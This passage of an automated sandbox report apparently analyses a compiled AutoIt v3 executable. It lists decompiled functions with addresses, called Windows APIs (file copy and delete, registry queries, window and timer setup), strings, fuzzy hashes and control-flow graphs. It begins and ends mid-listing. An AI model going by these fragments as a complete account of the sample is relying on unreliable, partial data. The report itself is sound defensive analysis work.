                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: DdL$DdL$DdL$DdL$Variable must be of type 'Object'.
                                                                              • API String ID: 0-2838938394
                                                                              • Opcode ID: 2c35b3d26c95a021f08b930a365da4d97caa2da8ff1c5750d170567e5b24b5e9
                                                                              • Instruction ID: 023dab180a9d3d77a7e8607c3136a2e1727c845c037ec0be429657ea2820e701
                                                                              • Opcode Fuzzy Hash: 2c35b3d26c95a021f08b930a365da4d97caa2da8ff1c5750d170567e5b24b5e9
                                                                              • Instruction Fuzzy Hash: C3A29E75A00205CFDB24CF56C480AAAB7B1FF58314F24887BE905AB391D739ED52CB99
                                                                              Function 0046445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFileAttributesW.KERNEL32(?,0043E398), ref: 0046446A
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0046447B
                                                                              • FindClose.KERNEL32(00000000), ref: 0046448B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$AttributesCloseFirst
                                                                              • String ID:
                                                                              • API String ID: 48322524-0
                                                                              • Opcode ID: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                                              • Instruction ID: 0270b6235cd3a211ff5fd07bbdee7491b27fcb3ec88e67c823a813e2b68c3cf0
                                                                              • Opcode Fuzzy Hash: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                                              • Instruction Fuzzy Hash: 54E0D8328105006B4610AB78EC0E4EE775C9E85335F100B6AFC35C11D0FB789904969F
                                                                              Function 004109D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410A5B
                                                                              • timeGetTime.WINMM ref: 00410D16
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410E53
                                                                              • Sleep.KERNEL32(0000000A), ref: 00410E61
                                                                              • LockWindowUpdate.USER32(00000000,?,?), ref: 00410EFA
                                                                              • DestroyWindow.USER32 ref: 00410F06
                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00410F20
                                                                              • Sleep.KERNEL32(0000000A,?,?), ref: 00444E83
                                                                              • TranslateMessage.USER32(?), ref: 00445C60
                                                                              • DispatchMessageW.USER32(?), ref: 00445C6E
                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00445C82
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbL$pbL$pbL$pbL
                                                                              • API String ID: 4212290369-1082885916
                                                                              • Opcode ID: c7d318ed77a4caedac4747d0211625527e950e7c208a1bc8e1125b7c96807fab
                                                                              • Instruction ID: d38973a2ad724f636fdb88fa2895c4b9f48f3c0ad1428ec49bcc8c13362f202a
                                                                              • Opcode Fuzzy Hash: c7d318ed77a4caedac4747d0211625527e950e7c208a1bc8e1125b7c96807fab
                                                                              • Instruction Fuzzy Hash: BBB29470608741DFEB24DF24C445BABB7E4BF84304F14492FE54997292D779E885CB8A
                                                                              Function 02F38550 Relevance: 20.0, APIs: 13, Instructions: 515COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastwsprintf
                                                                              • String ID:
                                                                              • API String ID: 2587402804-0
                                                                              • Opcode ID: 4f59804e8ad8ac9332cc74faadd3434d9349e4b3df81aa176b71054da66d7e84
                                                                              • Instruction ID: 3416b4708e58fea9e2460614653884210a120864905e32196077b3617a453114
                                                                              • Opcode Fuzzy Hash: 4f59804e8ad8ac9332cc74faadd3434d9349e4b3df81aa176b71054da66d7e84
                                                                              • Instruction Fuzzy Hash: 56F11AA2D4D3809EEB3766388C09775BBA16F526F8F4C0745F752CB1E2D76C8844C266
                                                                              Function 00469155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1109 469155-469205 call 431940 call 420db6 call 40522e call 468f5f call 404ee5 call 42354c 1122 46920b-469212 call 469734 1109->1122 1123 4692b8-4692bf call 469734 1109->1123 1128 4692c1-4692c3 1122->1128 1129 469218-4692b6 call 4240fb call 422dbc call 422d8d call 4240fb call 422d8d * 2 1122->1129 1123->1128 1130 4692c8 1123->1130 1131 46952a-46952b 1128->1131 1133 4692cb-469387 call 404f0b * 8 call 4698e3 call 42525b 1129->1133 1130->1133 1134 469548-469558 call 405211 1131->1134 1168 469390-4693ab call 468fa5 1133->1168 1169 469389-46938b 1133->1169 1172 4693b1-4693b9 1168->1172 1173 46943d-469449 call 4253a6 1168->1173 1169->1131 1174 4693c1 1172->1174 1175 4693bb-4693bf 1172->1175 1180 46945f-469463 1173->1180 1181 46944b-46945a DeleteFileW 1173->1181 1177 4693c6-4693e4 call 404f0b 1174->1177 1175->1177 1187 4693e6-4693eb 1177->1187 1188 46940e-469424 call 468953 call 424863 1177->1188 1183 469505-469519 CopyFileW 1180->1183 1184 469469-4694f2 call 4240bb call 4699ea call 468b06 1180->1184 1181->1131 1185 46952d-469543 DeleteFileW call 4698a2 1183->1185 1186 46951b-469528 DeleteFileW 1183->1186 1184->1185 1205 4694f4-469503 DeleteFileW 1184->1205 1185->1134 1186->1131 1192 4693ee-469401 call 4690dd 1187->1192 1202 469429-469434 1188->1202 1200 469403-46940c 1192->1200 1200->1188 1202->1172 1204 46943a 1202->1204 1204->1173 1205->1131
                                                                              APIs
                                                                                • Part of subcall function 00468F5F: __time64.LIBCMT ref: 00468F69
                                                                                • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                                                                              • __wsplitpath.LIBCMT ref: 00469234
                                                                                • Part of subcall function 004240FB: __wsplitpath_helper.LIBCMT ref: 0042413B
                                                                              • _wcscpy.LIBCMT ref: 00469247
                                                                              • _wcscat.LIBCMT ref: 0046925A
                                                                              • __wsplitpath.LIBCMT ref: 0046927F
                                                                              • _wcscat.LIBCMT ref: 00469295
                                                                              • _wcscat.LIBCMT ref: 004692A8
                                                                                • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FDE
                                                                                • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FED
                                                                              • _wcscmp.LIBCMT ref: 004691EF
                                                                                • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                                                                                • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00469452
                                                                              • _wcsncpy.LIBCMT ref: 004694C5
                                                                              • DeleteFileW.KERNEL32(?,?), ref: 004694FB
                                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00469511
                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469522
                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469534
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                              • String ID:
                                                                              • API String ID: 1500180987-0
                                                                              • Opcode ID: bb1147ec7c9e4a8a2e1b2febcbde42ff54d7ea5c84e3de9f37913cebb94ce0e8
                                                                              • Instruction ID: 02a21988af13e7247216c1d96107bbd8e14577c6ac0cce12fd44c5267f831f24
                                                                              • Opcode Fuzzy Hash: bb1147ec7c9e4a8a2e1b2febcbde42ff54d7ea5c84e3de9f37913cebb94ce0e8
                                                                              • Instruction Fuzzy Hash: 22C13DB1900129AADF11DF95CC81ADEB7BCEF85314F0040ABF609E6251EB749E858F69
                                                                              Function 00403015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                                              • RegisterClassExW.USER32(00000030), ref: 0040309E
                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                                              • LoadIconW.USER32(000000A9), ref: 004030F2
                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                              • API String ID: 2914291525-1005189915
                                                                              • Opcode ID: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                                                                              • Instruction ID: 4440f0663549e4d62e3da2fdffcae7bb40582d53fb7b12173dce245a48cd956c
                                                                              • Opcode Fuzzy Hash: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                                                                              • Instruction Fuzzy Hash: 5F317A71801348AFDB50DFA4DC84A9DBFF0FB09310F24456EE480E62A0D7B91599CF69
                                                                              Function 00403041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                                              • RegisterClassExW.USER32(00000030), ref: 0040309E
                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                                              • LoadIconW.USER32(000000A9), ref: 004030F2
                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                              • API String ID: 2914291525-1005189915
                                                                              • Opcode ID: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                                                                              • Instruction ID: 5f72cbcfe52bedf9aac6cae92f5874e6cc1455117f94183018d2e1bba946cea4
                                                                              • Opcode Fuzzy Hash: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                                                                              • Instruction Fuzzy Hash: DD21F9B1911208AFEB40EF94EC48B9DBBF4FB08700F10453AF511A62A0D7B555948FA9
                                                                              Function 0040708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1275 40708b-4071b0 call 431940 call 407667 call 404706 call 42050b call 407cab call 403f74 call 407667 call 407d8c RegOpenKeyExW 1292 43e8b1-43e8cc RegQueryValueExW 1275->1292 1293 4071b6-4071d3 call 405904 * 2 1275->1293 1295 43e943-43e94f RegCloseKey 1292->1295 1296 43e8ce-43e90d call 420db6 call 40522e RegQueryValueExW 1292->1296 1295->1293 1298 43e955-43e959 1295->1298 1308 43e92b-43e931 1296->1308 1309 43e90f-43e929 call 407bcc 1296->1309 1301 43e95e-43e984 call 4079f2 * 2 1298->1301 1315 43e986-43e994 call 4079f2 1301->1315 1316 43e9a9-43e9b6 call 422bfc 1301->1316 1313 43e933-43e940 call 420e2c * 2 1308->1313 1314 43e941 1308->1314 1309->1308 1313->1314 1314->1295 1315->1316 1325 43e996-43e9a7 call 422d8d 1315->1325 1327 43e9b8-43e9c9 call 422bfc 1316->1327 1328 43e9dc-43ea16 call 407de1 call 403f74 call 405904 call 4079f2 1316->1328 1336 43ea1c-43ea1d 1325->1336 1327->1328 1337 43e9cb-43e9db call 422d8d 1327->1337 1328->1293 1328->1336 1336->1301 1337->1328
                                                                              APIs
                                                                                • Part of subcall function 00404706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C52F8,?,004037AE,?), ref: 00404724
                                                                                • Part of subcall function 0042050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00407165), ref: 0042052D
                                                                              • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004071A8
                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0043E8C8
                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0043E909
                                                                              • RegCloseKey.ADVAPI32(?), ref: 0043E947
                                                                              • _wcscat.LIBCMT ref: 0043E9A0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                              • API String ID: 2673923337-2727554177
                                                                              • Opcode ID: 436606bc39e4e285cc41a643d5592b489ca647995d37ef15f881fbd26025604c
                                                                              • Instruction ID: d25a402f486e77f999364444344266e14871576642d40cf04fb282302ec68e46
                                                                              • Opcode Fuzzy Hash: 436606bc39e4e285cc41a643d5592b489ca647995d37ef15f881fbd26025604c
                                                                              • Instruction Fuzzy Hash: E9718E71509301AEC340EF26E841D5BBBE8FF88314F51893FF445972A1DB79A948CB5A
                                                                              Function 00403633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1345 403633-403681 1347 4036e1-4036e3 1345->1347 1348 403683-403686 1345->1348 1347->1348 1351 4036e5 1347->1351 1349 4036e7 1348->1349 1350 403688-40368f 1348->1350 1353 4036ed-4036f0 1349->1353 1354 43d0cc-43d0fa call 411070 call 411093 1349->1354 1355 403695-40369a 1350->1355 1356 40374b-403753 PostQuitMessage 1350->1356 1352 4036ca-4036d2 DefWindowProcW 1351->1352 1363 4036d8-4036de 1352->1363 1357 4036f2-4036f3 1353->1357 1358 403715-40373c SetTimer RegisterWindowMessageW 1353->1358 1392 43d0ff-43d106 1354->1392 1360 4036a0-4036a2 1355->1360 1361 43d154-43d168 call 462527 1355->1361 1362 403711-403713 1356->1362 1364 4036f9-40370c KillTimer call 40443a call 403114 1357->1364 1365 43d06f-43d072 1357->1365 1358->1362 1367 40373e-403749 CreatePopupMenu 1358->1367 1368 403755-403764 call 4044a0 1360->1368 1369 4036a8-4036ad 1360->1369 1361->1362 1386 43d16e 1361->1386 1362->1363 1364->1362 1377 43d074-43d076 1365->1377 1378 43d0a8-43d0c7 MoveWindow 1365->1378 1367->1362 1368->1362 1373 4036b3-4036b8 1369->1373 1374 43d139-43d140 1369->1374 1384 43d124-43d134 call 462d36 1373->1384 1385 4036be-4036c4 1373->1385 1374->1352 1382 43d146-43d14f call 457c36 1374->1382 1379 43d097-43d0a3 SetFocus 1377->1379 1380 43d078-43d07b 1377->1380 1378->1362 1379->1362 1380->1385 1388 43d081-43d092 call 411070 1380->1388 1382->1352 1384->1362 1385->1352 1385->1392 1386->1352 1388->1362 1392->1352 1396 43d10c-43d11f call 40443a call 40434a 1392->1396 1396->1352
                                                                              APIs
                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 004036D2
                                                                              • KillTimer.USER32(?,00000001), ref: 004036FC
                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0040371F
                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040372A
                                                                              • CreatePopupMenu.USER32 ref: 0040373E
                                                                              • PostQuitMessage.USER32(00000000), ref: 0040374D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                              • String ID: TaskbarCreated$%I
                                                                              • API String ID: 129472671-1195164674
                                                                              • Opcode ID: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                                                                              • Instruction ID: dec945db719cbeb7d7ffc5e313a4f07f26295059660cff28048481092df75402
                                                                              • Opcode Fuzzy Hash: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                                                                              • Instruction Fuzzy Hash: F34127B1110505ABDB246F68EC09F7E3E98EB44302F50453BF602A63E1C67EAD95972E
                                                                              Function 00403A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00403A50
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                                                                              • LoadIconW.USER32(00000063), ref: 00403A76
                                                                              • LoadIconW.USER32(000000A4), ref: 00403A88
                                                                              • LoadIconW.USER32(000000A2), ref: 00403A9A
                                                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                                                                              • RegisterClassExW.USER32(?), ref: 00403B16
                                                                                • Part of subcall function 00403041: GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                                                • Part of subcall function 00403041: RegisterClassExW.USER32(00000030), ref: 0040309E
                                                                                • Part of subcall function 00403041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                                                • Part of subcall function 00403041: InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                                                • Part of subcall function 00403041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                                                • Part of subcall function 00403041: LoadIconW.USER32(000000A9), ref: 004030F2
                                                                                • Part of subcall function 00403041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                              • String ID: #$0$AutoIt v3
                                                                              • API String ID: 423443420-4155596026
                                                                              • Opcode ID: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                                                              • Instruction ID: 95199bfa57b98a40bbf2a31e3c8143aaf86e5cd3d1ec7ed5ae4cf298cf618104
                                                                              • Opcode Fuzzy Hash: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                                                              • Instruction Fuzzy Hash: C4214874D00308AFEB50DFA4EC09F9D7BF4FB08711F1045BAE500A62A1D3B966948F88
                                                                              Function 02F1CE90 Relevance: 16.2, APIs: 10, Instructions: 1193COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7f6f2324796d7790dc190cd7c1dfa3a015b29290d370379cfab0862c9caf5947
                                                                              • Instruction ID: 23538c107c6dfdca67d2b7b1c4c7e94ef4fcc681592757ceee35ff99e5705119
                                                                              • Opcode Fuzzy Hash: 7f6f2324796d7790dc190cd7c1dfa3a015b29290d370379cfab0862c9caf5947
                                                                              • Instruction Fuzzy Hash: A9A2C032D4D3808FD735CB18C8547AABBF1AFC5398F89491ED29997296D335A804CB93
                                                                              Function 00403766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                                                                              Download Yara Rule

